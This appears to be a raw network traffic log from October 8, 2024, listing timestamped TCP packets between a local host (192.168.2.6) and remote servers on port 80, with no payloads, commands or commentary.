Oct 8, 2024 11:30:57.672278881 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672288895 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672310114 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672332048 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672344923 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672353983 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672362089 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672446966 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672523022 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672538042 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672547102 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672555923 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672565937 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672574997 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672585011 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672606945 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672606945 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672606945 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672619104 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672633886 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672643900 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672652960 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672662973 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672673941 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672683954 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672694921 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672703028 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672703028 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672703028 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672703028 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672714949 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672725916 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672981024 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673038960 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673049927 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673091888 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673091888 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673091888 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673192978 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673207998 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673217058 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673227072 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673238039 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673247099 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673258066 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673268080 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673278093 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673288107 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.673304081 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673304081 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673304081 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673304081 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.673494101 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.716137886 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755619049 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755647898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755657911 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755669117 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755714893 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755728006 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755733967 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755754948 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755764008 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755774021 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755784988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755810022 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755835056 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755850077 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755858898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755867958 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755880117 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755888939 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755888939 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755903959 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755917072 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755922079 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755929947 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755939960 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755949974 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755959988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755970001 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.755976915 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755976915 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.755992889 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756001949 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756011009 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756021023 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756031036 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756040096 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756040096 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756050110 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756059885 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756068945 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756078005 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756087065 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756087065 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756094933 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756104946 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756115913 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756136894 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756136894 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756145000 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756160021 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756171942 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756182909 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756191015 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756201029 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756211042 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756221056 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756221056 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756233931 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756249905 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756259918 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756268978 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756278038 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756283045 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756292105 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756302118 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756311893 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756311893 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756320000 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756329060 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756340027 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756350994 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.756366014 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756366014 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.756386995 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757209063 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757270098 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757280111 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757287979 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757318020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757328033 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757368088 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757447004 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757520914 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757546902 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757564068 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757574081 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757591963 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757647038 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757656097 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757662058 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757671118 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757679939 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757688999 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757774115 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757801056 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757810116 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757821083 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757834911 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757844925 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757854939 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757865906 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757865906 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757874012 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757884026 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757893085 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757900953 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757909060 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757925034 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757935047 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757944107 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757956028 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757961988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757971048 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757982016 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.757991076 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.757991076 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758008003 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758023977 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758023977 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758030891 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758045912 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758055925 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758066893 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758076906 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758085966 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758091927 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758091927 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758101940 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758111954 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758121967 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758131027 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758140087 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758147955 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758156061 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758164883 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758172035 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758183002 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758191109 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.758215904 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.758215904 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759032965 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759073019 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759083033 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759108067 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759118080 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759147882 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759159088 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759169102 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759179115 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759221077 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759221077 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759238005 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759248972 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759259939 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759278059 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759287119 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759296894 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759320021 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759325027 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759332895 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759346962 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759346962 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759356976 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759366989 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759378910 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759394884 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759402037 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759402037 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759414911 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759426117 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759435892 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.759462118 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.759462118 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.809880018 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844269991 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844294071 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844305992 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844316959 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844329119 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844338894 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844348907 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844358921 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844372034 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844391108 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844409943 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844414949 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844425917 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844435930 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844446898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844456911 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844466925 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844475985 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844485998 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844496012 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844505072 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844505072 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844516039 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844526052 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844538927 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844544888 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844552994 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844563961 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844575882 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.844588041 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844588041 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.844676018 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:01.457417011 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.281590939 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.286959887 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.287060976 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.287281036 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.292376041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.898621082 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.898677111 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.898715973 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.898823023 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.899350882 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899434090 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899468899 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899502993 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899513006 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.899513006 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.899538040 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899574041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899610043 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.899625063 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.899672985 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.903893948 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.903929949 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.903963089 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.904206038 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.918989897 CEST	49992	80	192.168.2.6	34.205.242.146
Oct 8, 2024 11:31:04.924506903 CEST	80	49992	34.205.242.146	192.168.2.6
Oct 8, 2024 11:31:04.924578905 CEST	49992	80	192.168.2.6	34.205.242.146
Oct 8, 2024 11:31:04.924664974 CEST	49992	80	192.168.2.6	34.205.242.146
Oct 8, 2024 11:31:04.930345058 CEST	80	49992	34.205.242.146	192.168.2.6
Oct 8, 2024 11:31:04.972454071 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.990995884 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991060972 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991097927 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991125107 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.991134882 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991172075 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.991174936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991252899 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.991626978 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991657019 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991693020 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991725922 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.991748095 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991784096 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991841078 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991873980 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.991939068 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.991939068 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.992682934 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.992741108 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.992820024 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.992880106 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.992922068 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.992923975 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.992954969 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.992981911 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.993009090 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.996131897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.996246099 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.996273994 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.996301889 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.996323109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.996323109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.996330976 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:04.996416092 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:04.996597052 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.044194937 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.083488941 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083518982 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083539009 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083549976 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083560944 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.083570957 CEST	49991	80	192.168.2.6	63.250.38.167
